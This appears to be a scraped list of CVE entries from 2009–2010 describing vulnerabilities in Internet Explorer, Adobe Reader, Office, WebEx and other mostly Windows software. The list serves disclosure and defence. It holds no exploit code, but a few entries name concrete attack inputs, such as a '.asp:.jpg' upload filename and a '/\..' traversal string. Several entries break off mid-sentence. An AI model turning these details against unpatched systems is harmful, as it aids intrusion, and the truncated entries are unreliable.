CVE-2010-0245. [CVE-2010-0245] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, and CVE-2010-0246. [CVE-2010-0244] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-2530 and CVE-2009-2531. [CVE-2010-0243] Buffer overflow in MSO.DLL in Microsoft Office XP SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Office document, aka "MSO.DLL Buffer Overflow." [CVE-2010-0204] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0197, and CVE-2010-0201. [CVE-2010-0203] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0199, and CVE-2010-0202. [CVE-2010-0202] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0199, and CVE-2010-0203. [CVE-2010-0201] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0197, and CVE-2010-0204. [CVE-2010-0199] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0198, CVE-2010-0202, and CVE-2010-0203. [CVE-2010-0198] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0199, CVE-2010-0202, and CVE-2010-0203. [CVE-2010-0197] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0194, CVE-2010-0201, and CVE-2010-0204. [CVE-2010-0196] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0192 and CVE-2010-0193. [CVE-2010-0195] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, do not properly handle fonts, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-0194] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to cause a denial of service (memory corruption) or execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-0197, CVE-2010-0201, and CVE-2010-0204. [CVE-2010-0193] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0192 and CVE-2010-0196. [CVE-2010-0192] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2010-0193 and CVE-2010-0196. [CVE-2010-0191] Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified vectors, related to a "prefix protocol handler vulnerability." [CVE-2010-0190] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-0161] The nsAuthSSPI::Unwrap function in extensions/auth/nsAuthSSPI.cpp in Mozilla Thunderbird before 2.0.0.24 and SeaMonkey before 1.1.19 on Windows Vista, Windows Server 2008 R2, and Windows 7 allows remote SMTP, IMAP, and POP servers to cause a denial of service (heap memory corruption and application crash) or possibly execute arbitrary code via crafted data in a session that uses SSPI. [CVE-2010-0138] Buffer overflow in Cisco CiscoWorks Internetwork Performance Monitor (IPM) 2.6 and earlier on Windows, as distributed in CiscoWorks LAN Management Solution (LMS), allows remote attackers to execute arbitrary code via a malformed getProcessName CORBA General Inter-ORB Protocol (GIOP) request, related to a "third-party component," aka Bug ID CSCsv62350. [CVE-2010-0120] Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows allows remote attackers to execute arbitrary code via large size values in QCP audio content. [CVE-2010-0117] RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows do not properly handle dimensions during YUV420 transformations, which might allow remote attackers to execute arbitrary code via crafted MP4 content. [CVE-2010-0116] Integer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows might allow remote attackers to execute arbitrary code via a crafted QCP file that triggers a heap-based buffer overflow. [CVE-2010-0103] UsbCharger.dll in the Energizer DUO USB battery charger software contains a backdoor that is implemented through the Arucer.dll file in the %WINDIR%\system32 directory, which allows remote attackers to download arbitrary programs onto a Windows PC, and execute these programs, via a request to TCP port 7777. [CVE-2010-0045] Apple Safari before 4.0.5 on Windows does not properly validate external URL schemes, which allows remote attackers to open local files and execute arbitrary code via a crafted HTML document. [CVE-2010-0043] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted TIFF image. [CVE-2010-0042] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows does not ensure that memory access is associated with initialized memory, which allows remote attackers to obtain potentially sensitive information from process memory via a crafted TIFF image. [CVE-2010-0041] ImageIO in Apple Safari before 4.0.5 and iTunes before 9.1 on Windows does not ensure that memory access is associated with initialized memory, which allows remote attackers to obtain potentially sensitive information from process memory via a crafted BMP image. [CVE-2010-0040] Integer overflow in ColorSync in Apple Safari before 4.0.5 on Windows, and iTunes before 9.1, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an image with a crafted color profile that triggers a heap-based buffer overflow. [CVE-2010-0034] Stack-based buffer overflow in Microsoft Office PowerPoint 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "Office PowerPoint Viewer TextCharsAtom Record Stack Overflow Vulnerability." [CVE-2010-0033] Stack-based buffer overflow in Microsoft Office PowerPoint 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint Viewer TextBytesAtom Record Stack Overflow Vulnerability." [CVE-2010-0032] Use-after-free vulnerability in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "OEPlaceholderAtom Use After Free Vulnerability." [CVE-2010-0031] Array index error in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3, and PowerPoint in Office 2004 for Mac, allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint OEPlaceholderAtom 'placementId' Invalid Array Indexing Vulnerability." [CVE-2010-0030] Heap-based buffer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint LinkedSlideAtom Heap Overflow Vulnerability." [CVE-2010-0029] Buffer overflow in Microsoft Office PowerPoint 2002 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint File Path Handling Buffer Overflow Vulnerability." [CVE-2009-5092] Cross-site scripting (XSS) vulnerability in the management interface in Microsoft FAST ESP 5.1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4764] Adobe Reader 8.x and 9.x on Windows is able to execute EXE files that are embedded in a PDF document, which makes it easier for remote attackers to trick users into executing arbitrary code via a crafted document. [CVE-2009-4741] Unspecified vulnerability in the Extras Manager before 2.0.0.67 in Skype before 4.1.0.179 on Windows has unknown impact and attack vectors. [CVE-2009-4654] Stack-based buffer overflow in the dhost module in Novell eDirectory 8.8 SP5 for Windows allows remote authenticated users to execute arbitrary code via long sadminpwd and verifypwd parameters in a submit action to /dhost/httpstk. [CVE-2009-4653] Stack-based buffer overflow in the dhost module in Novell eDirectory 8.8 SP5 for Windows allows remote authenticated users to cause a denial of service (dhost.exe crash) and possibly execute arbitrary code via a long string to /dhost/modules?I:. [CVE-2009-4445] Microsoft Internet Information Services (IIS), when used in conjunction with unspecified third-party upload applications, allows remote attackers to create empty files with arbitrary extensions via a filename containing an initial extension followed by a : (colon) and a safe extension, as demonstrated by an upload of a .asp:.jpg file that results in creation of an empty .asp file, related to support for the NTFS Alternate Data Streams (ADS) filename syntax. NOTE: it could be argued that this is a vulnerability in the third-party product, not IIS, because the third-party product should be applying its extension restrictions to the portion of the filename before the colon. [CVE-2009-4444] Microsoft Internet Information Services (IIS) 5.x and 6.x uses only the portion of a filename before a [CVE-2009-4378] The IPMI dissector in Wireshark 1.2.0 through 1.2.4 on Windows allows remote attackers to cause a denial of service (crash) via a crafted packet, related to "formatting a date/time using strftime." [CVE-2009-4324] Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009. [CVE-2009-4186] Stack consumption vulnerability in Apple Safari 4.0.3 on Windows allows remote attackers to cause a denial of service (application crash) via a long URI value (aka url) in the Cascading Style Sheets (CSS) background property. [CVE-2009-4118] The StartServiceCtrlDispatcher function in the cvpnd service (cvpnd.exe) in Cisco VPN client for Windows before 5.0.06.0100 does not properly handle an ERROR_FAILED_SERVICE_CONTROLLER_CONNECT error, which allows local users to cause a denial of service (service crash and VPN connection loss) via a manual start of cvpnd.exe while the cvpnd service is running. [CVE-2009-4074] The XSS Filter in Microsoft Internet Explorer 8 allows remote attackers to leverage the "response-changing mechanism" to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, related to the details of output encoding and improper modification of an HTML attribute, aka "XSS Filter Script Handling Vulnerability." [CVE-2009-4073] The printing functionality in Microsoft Internet Explorer 8 allows remote attackers to discover a local pathname, and possibly a local username, by reading the dc:title element of a PDF document that was generated from a local web page. [CVE-2009-3959] Integer overflow in the U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a malformed PDF document. [CVE-2009-3958] Multiple stack-based buffer overflows in the NOS Microsystems getPlus Helper ActiveX control before 1.6.2.49 in gp.ocx in the Download Manager in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow remote attackers to execute arbitrary code via unspecified initialization parameters. [CVE-2009-3957] Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow attackers to cause a denial of service (NULL pointer dereference) via unspecified vectors. [CVE-2009-3956] The default configuration of Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, does not enable the Enhanced Security feature, which has unspecified impact and attack vectors, related to a "script injection vulnerability," as demonstrated by Acrobat Forms Data Format (FDF) behavior that allows cross-site scripting (XSS) by user-assisted remote attackers. [CVE-2009-3955] Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted JPC_MS_RGN marker in the Jp2c stream of a JpxDecode encoded data stream, which triggers an integer sign extension that bypasses a sanity check, leading to memory corruption. [CVE-2009-3954] The 3D implementation in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, might allow attackers to execute arbitrary code via unspecified vectors, related to a "DLL-loading vulnerability." [CVE-2009-3953] The U3D implementation in Adobe Reader and Acrobat 9.x before 9.3, 8.x before 8.2 on Windows and Mac OS X, and 7.x before 7.1.4 allows remote attackers to execute arbitrary code via malformed U3D data in a PDF document, related to a CLODProgressiveMeshDeclaration "array boundary issue," a different vulnerability than CVE-2009-2994. [CVE-2009-3951] Unspecified vulnerability in the Flash Player ActiveX control in Adobe Flash Player before 10.0.42.34 and Adobe AIR before 1.5.3 on Windows allows remote attackers to obtain the names of local files via unknown vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4820. [CVE-2009-3943] Microsoft Internet Explorer 6 through 6.0.2900.2180 and 7 through 7.0.6000.16711 allows remote attackers to cause a denial of service (application hang) via a JavaScript loop that configures the home page by using the setHomePage method and a DHTML behavior property. [CVE-2009-3936] Unspecified vulnerability in Citrix Online Plug-in for Windows 11.0.x before 11.0.150 and 11.x before 11.2, Online Plug-in for Mac before 11.0, Receiver for iPhone before 1.0.3, and ICA Java, Mac, UNIX, and Windows Clients for XenApp and XenDesktop allows remote attackers to impersonate the SSL/TLS server and bypass authentication via a crafted certificate, a different vulnerability than CVE-2009-3555. [CVE-2009-3902] Directory traversal vulnerability in Cherokee Web Server 0.5.4 and earlier for Windows allows remote attackers to read arbitrary files via a /\.. (slash backslash dot dot) in the URL. [CVE-2009-3885] Sun Java SE 5.0 before Update 22 and 6 before Update 17 on Windows allows remote attackers to cause a denial of service via a BMP file containing a link to a UNC share pathname for an International Color Consortium (ICC) profile file, probably a related issue to CVE-2007-2789, aka Bug Id 6632445. [CVE-2009-3883] Multiple unspecified vulnerabilities in the Windows Pluggable Look and Feel (PL&F) feature in the Swing implementation in Sun Java SE 5.0 before Update 22 and 6 before Update 17, and OpenJDK, have unknown impact and remote attack vectors, related to "information leaks in mutable variables," aka Bug Id 6657138. [CVE-2009-3864] The Java Update functionality in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22 and JDK and JRE 6 before Update 17, when a non-English version of Windows is used, does not retrieve available new JRE versions, which allows remote attackers to leverage vulnerabilities in older releases of this software, aka Bug Id 6869694. [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload. [CVE-2009-3841] Unspecified vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.5x, 7.5x, and 7.60 on Windows allows remote authenticated users to execute arbitrary code via unknown vectors. [CVE-2009-3832] Opera before 10.01 on Windows does not prevent use of Web fonts in rendering the product's own user interface, which allows remote attackers to spoof the address field via a crafted web site. [CVE-2009-3830] The download functionality in Team Services in Microsoft Office SharePoint Server 2007 12.0.0.4518 and 12.0.0.6219 allows remote attackers to read ASP.NET source code via pathnames in the SourceUrl and Source parameters to _layouts/download.aspx. [CVE-2009-3746] XScreenSaver in Sun Solaris 10, when the accessibility feature is enabled, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, a different vulnerability than CVE-2009-1276 and CVE-2009-2711. [CVE-2009-3674] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671. [CVE-2009-3673] Microsoft Internet Explorer 7 and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-3672] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory that (1) were not properly initialized or (2) are deleted, which allows remote attackers to execute arbitrary code via vectors involving a call to the getElementsByTagName method for the STYLE tag name, selection of the single element in the returned list, and a change to the outerHTML property of this element, related to Cascading Style Sheets (CSS) and mshtml.dll, aka "HTML Object Memory Corruption Vulnerability." NOTE: some of these details are obtained from third party information. NOTE: this issue was originally assigned CVE-2009-4054, but Microsoft assigned a duplicate identifier of CVE-2009-3672. CVE consumers should use this identifier instead of CVE-2009-4054. [CVE-2009-3671] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3674. [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue. [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges. [CVE-2009-3532] Multiple SQL injection vulnerabilities in login.asp (aka the login screen) in LogRover 2.3 and 2.3.3 on Windows allow remote attackers to execute arbitrary SQL commands via the (1) uname and (2) pword parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-3524] Unspecified vulnerability in ashWsFtr.dll in avast! Home and Professional for Windows before 4.8.1356 has unknown impact and local attack vectors. [CVE-2009-3523] aavmKer4.sys in avast! Home and Professional for Windows before 4.8.1356 does not properly validate input to IOCTLs (1) 0xb2d6000c and (2) 0xb2d60034, which allows local users to gain privileges via IOCTL requests using crafted kernel addresses that trigger memory corruption, a different vulnerability than CVE-2008-1625. [CVE-2009-3522] Stack-based buffer overflow in aswMon2.sys in avast! Home and Professional for Windows 4.8.1351, and possibly other versions before 4.8.1356, allows local users to cause a denial of service (system crash) and possibly gain privileges via a crafted IOCTL request to IOCTL 0xb2c80018. [CVE-2009-3450] Multiple cross-site scripting (XSS) vulnerabilities in WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allow remote attackers to inject arbitrary web script or HTML via parameters with names beginning with __ (underscore underscore) sequences, which are incompatible with an XSS protection mechanism provided by Microsoft ASP.NET. [CVE-2009-3384] Multiple unspecified vulnerabilities in WebKit in Apple Safari before 4.0.4 on Windows allow remote FTP servers to execute arbitrary code, cause a denial of service (application crash), or obtain sensitive information via a crafted directory listing in a reply. [CVE-2009-3344] Unspecified vulnerability in SAP Crystal Reports Server 2008 on Windows XP allows attackers to cause a denial of service (infinite loop) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.3 through 8.11. NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3275] Blocks/Common/Src/Configuration/Manageability/Adm/AdmContentBuilder.cs in Microsoft patterns & practices Enterprise Library (aka EntLib) allows context-dependent attackers to cause a denial of service (CPU consumption) via an input string composed of many \ (backslash) characters followed by a " (double quote), related to a certain regular expression, aka a "ReDoS" vulnerability. [CVE-2009-3270] Microsoft Internet Explorer 7 through 7.0.6000.16711 allows remote attackers to cause a denial of service (unusable browser) by calling the window.print function in a loop, aka a "printing DoS attack," possibly a related issue to CVE-2009-0821. [CVE-2009-3267] Microsoft Internet Explorer 6 through 6.0.2900.2180, and 7.0.6000.16711, allows remote attackers to cause a denial of service (CPU consumption) via an automatically submitted form containing a KEYGEN element, a related issue to CVE-2009-1828. [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/. [CVE-2009-3243] Unspecified vulnerability in the TLS dissector in Wireshark 1.2.0 and 1.2.1, when running on Windows, allows remote attackers to cause a denial of service (application crash) via unknown vectors related to TLS 1.2 conversations. [CVE-2009-3177] Unspecified vulnerability in Kaspersky Online Scanner 7.0 has unknown impact and attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.8, (1) "Kaspersky Online Antivirus Scanner 7.0 exploit (Linux)" and (2) "Kaspersky Online Antivirus Scanner 7.0 exploit (Windows)." NOTE: as of 20090909, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3135] Stack-based buffer overflow in Microsoft Office Word 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, Open XML File Format Converter for Mac, Office Word Viewer 2003 SP3, and Office Word Viewer allow remote attackers to execute arbitrary code via a Word document with a malformed File Information Block (FIB) structure, aka "Microsoft Office Word File Information Memory Corruption Vulnerability." [CVE-2009-3134] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3133] Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a spreadsheet containing a malformed object that triggers memory corruption, related to "loading Excel records," aka "Excel Document Parsing Memory Corruption Vulnerability." [CVE-2009-3132] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3131] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3130] Heap-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via a spreadsheet containing a malformed Binary File Format (aka BIFF) record that triggers memory corruption, aka "Excel Document Parsing Heap Overflow Vulnerability." [CVE-2009-3129] Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-3128] Microsoft Office Excel 2002 SP3 and 2003 SP3, and Office Excel Viewer 2003 SP3, does not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a spreadsheet with a malformed record object, aka "Excel SxView Memory Corruption Vulnerability." [CVE-2009-3127] Microsoft Office Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, Open XML File Format Converter for Mac, and Office Excel Viewer 2003 SP3 do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Cache Memory Corruption Vulnerability." [CVE-2009-3099] Unspecified vulnerability in HP OpenView Operations Manager 8.1 on Windows Server 2003 SP2 allows remote attackers to have an unknown impact, related to a "Remote exploit," as demonstrated by a certain module in VulnDisco Pack Professional 8.11, a different vulnerability than CVE-2007-3872. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3098] Unspecified vulnerability in the Portal in HP Operations Dashboard 2.1 on Windows Server 2003 SP2 allows remote attackers to have an unknown impact, related to a "Remote exploit," as demonstrated by a certain module in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3097] Multiple unspecified vulnerabilities in HP Performance Insight 5.3 on Windows allow attackers to obtain sensitive information via unknown vectors, as demonstrated by certain modules in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3096] Multiple unspecified vulnerabilities in HP Performance Insight 5.3 allow remote attackers to have an unknown impact, related to (1) a "Remote exploit" on Windows platforms, and (2) a "Remote preauthentication exploit" on the Windows Server 2003 SP2 platform, as demonstrated by certain modules in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3089] IBM Tivoli Directory Server (TDS) 6.0 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via unspecified vectors, related to (1) the ibmslapd.exe daemon on Windows and (2) the ibmdiradm daemon in the administration server on Linux, as demonstrated by certain modules in VulnDisco Pack Professional 8.11, a different vulnerability than CVE-2006-0717. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3087] Unspecified vulnerability in nserver.exe in the server in IBM Lotus Domino 8.0 on Windows Server 2003 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2009-3032] Integer overflow in kvolefio.dll 8.5.0.8339 and 10.5.0.0 in the Autonomy KeyView Filter SDK, as used in IBM Lotus Notes 8.5, Symantec Mail Security for Microsoft Exchange 5.0.10 through 5.0.13, and other products, allows context-dependent attackers to execute arbitrary code via a crafted OLE document that triggers a heap-based buffer overflow. [CVE-2009-3023] Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability." [CVE-2009-3003] Microsoft Internet Explorer 6 through 8 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. [CVE-2009-2987] Unspecified vulnerability in an ActiveX control in Adobe Reader and Acrobat 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2 on Windows allows remote attackers to cause a denial of service via unknown vectors. [CVE-2009-2975] Mozilla Firefox 3.5.2 on Windows XP, in some situations possibly involving an incompletely configured protocol handler, does not properly implement setting the document.location property to a value specifying a protocol associated with an external application, which allows remote attackers to cause a denial of service (memory consumption) via vectors involving a series of function calls that set this property, as demonstrated by (1) the chromehtml: protocol and (2) the aim: protocol. [CVE-2009-2954] Microsoft Internet Explorer 6.0.2900.2180 and earlier allows remote attackers to cause a denial of service (CPU consumption and application hang) via JavaScript code with a long string value for the hash property (aka location.hash), a related issue to CVE-2008-5715. [CVE-2009-2880] Buffer overflow in atrpui.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2879] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2878. [CVE-2009-2878] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2879. [CVE-2009-2877] Stack-based buffer overflow in ataudio.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2876] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2878 and CVE-2009-2879. [CVE-2009-2875] Buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file. [CVE-2009-2838] Integer overflow in QuickLook in Apple Mac OS X 10.5.8 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Office document that triggers a buffer overflow. [CVE-2009-2813] Samba 3.4 before 3.4.2, 3.3 before 3.3.8, 3.2 before 3.2.15, and 3.0.12 through 3.0.36, as used in the SMB subsystem in Apple Mac OS X 10.5.8 when Windows File Sharing is enabled, Fedora 11, and other operating systems, does not properly handle errors in resolving pathnames, which allows remote authenticated users to 